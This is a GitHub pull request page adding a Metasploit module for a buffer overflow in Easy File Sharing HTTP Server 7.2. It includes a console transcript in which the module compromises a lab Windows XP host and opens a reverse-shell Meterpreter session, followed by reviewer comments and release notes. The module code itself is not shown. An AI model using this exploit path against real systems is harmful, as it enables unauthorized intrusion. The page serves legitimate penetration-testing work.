Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Easy File Sharing HTTP Server 7.2 - Post Overflow exploit #8579

Merged
merged 3 commits into from Jun 22, 2017

Conversation

Mzack9999
Copy link
Contributor

This module exploits a post buffer overflow vulnerability of Easy File Sharing HTTP Server 7.2

Verification

Tested on: Windows XP Sp3 English
Vulnerable application: http://www.sharing-file.com/efssetup.exe

Example output:

marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easyfilesharing_post
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easyfilesharing_post) > exploit
 
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
 
meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
 
[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easyfilesharing_post) >

@pbarry-r7
Copy link
Contributor

Thanks for your PR, @Mzack9999. Would you mind adding some docs when you have a moment? Something like this: https://github.com/rapid7/metasploit-framework/pull/8577/files Thx.

@wwebb-r7 wwebb-r7 self-assigned this Jun 22, 2017
@wwebb-r7
Copy link
Contributor

Works fine. I'm going to go ahead and land it, but I'll take a look to see if there is anyway to minimize the amount of inc edx gadgets, if only for my own curiosity.

@wwebb-r7 wwebb-r7 merged commit c7a55ef into rapid7:master Jun 22, 2017
@wwebb-r7
Copy link
Contributor

wwebb-r7 commented Jun 22, 2017

Release Notes

The exploits/windows/http/easyfilesharing_post module has been added to the framework. This module exploits a remote buffer overflow vulnerability in the Easy File Sharing HTTP Server 7.2.

@Mzack9999 Mzack9999 deleted the easyfilesharing_post_bof.rb branch March 16, 2018 21:26
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants